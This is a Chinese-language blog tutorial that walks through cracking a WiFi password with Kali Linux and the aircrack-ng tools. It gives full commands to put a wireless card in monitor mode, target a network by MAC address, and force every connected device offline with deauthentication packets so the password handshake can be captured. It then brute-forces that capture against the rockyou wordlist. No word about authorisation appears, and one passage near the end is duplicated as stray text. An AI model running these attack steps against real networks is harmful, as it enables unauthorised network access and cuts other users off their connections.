admin管理员组

文章数量:1620374

kali暴力破解WiFi密码实验步骤

建议在kali的root模式下进行

实验条件:

  1. window7下的VMware装的kali 2020

  2. 某宝买的无线 网卡,注意,有些厂家的网卡不支持Linux系统,所以在买网卡时,最好先询问一下

  3. 在官网下载的驱动,解压之后直接运行install.sh,我在安装时,有报错误的,但是影响不大,我是直接关机重启虚拟机就好了,可直接查看iwconfig,如果出现wlan0则表示,驱动安装成功

  4. 查看无线网卡

指令airmon-ng

2. 开启监听模式

命令 airmon-ng start wlan0

说明:有些开启监听模式时,查看iwconfig,网卡名字wlan0会变成wlan0mon,我的电脑则不变,只要出现上述enable说明已经开启,如若变成网卡名字变成wlan0mon,以下操作将用wlan0mon,视自己情况而定

如果监听不能打开,执行命令:airmon-ng check kill,之后重新运行监听命令

  1. 扫描附近WiFi

    命令:

    airodump-ng wlan0
    

BSSID 是MAC地址

PWR 信号强度,越小越好 –

CH WiFi占用的通道号

ENC WiFi的加密方式wlan

ESSID表示WIFI名字

选取好目标WiFi,按下Ctrl+c

  1. 对目标WiFi的捕获

    airodump-ng -c 1 --bssid B0:95:8E:16:A0:CF wlan0 -w 675
     #格式 -c 选择通道号 --bssid WiFi的mac地址 wlan0网卡,捕获的带有密码的数据包存放名称
    #或者
    airodump-ng --bssid B0:95:8E:16:A0:CF -c 1 wlan0 -w 675
    

  1. 断网获取带有密码的数据包

当查看到有客户连接到目标WiFi,我们是没法获带有密码的数据包,需要将该WiFi下的设备进行踢下线(也可将某一个设备进行踢下线),设备断网之后会重新登录,可以自动捕获到带有密码的数据包

新开一个终端,输入如下命令

aireplay-ng -0 10 -a B0:95:8E:16:A0:CF wlan0 #将所有用户踢下线
aireplay-ng -0 10 -a B0:95:8E:16:A0:CF -c (某设备的mac地址) wlan0  #踢出某个用户设备

在捕获WiFi终端中,会出现以下信息代表信息捕捉到

此时,使用命令:ls

上图箭头指向是我们需要的数据包,*.cap格式。使用最近的一次数据包

  1. 爆破密码

    打开主文件夹,新建文件夹WiFi,将675-03.cap以及密码字典复制到WiFi文件夹

    在WiFi文件夹下打开终端

    aircrack-ng -w 1pass01.txt 675-03.cap
    

kali自带一个字典库

#rockyou需要进行解压,位于/usr/share/wordlists/ 
#解压命令如下
gzip -d /usr/share/wordlists/rockyou.txt.gz
#爆破命令
aircrack-ng -w /usr/share/wordlists/rockyou.txt 675-03.cap

之后就是漫长的等待,流程是这样,

附带命令:

#停止监听命令
airmon-ng stop wlan0 

ckyou.txt 675-03.cap


之后就是漫长的等待,流程是这样,

附带命令:

```powershell
#停止监听命令
airmon-ng stop wlan0 

后附密码字典,需要自收
https://download.csdn/download/qq_45435398/16490945
密码字典 https://download.csdn/download/qq_45435398/16490945

本文标签: Kaliwifi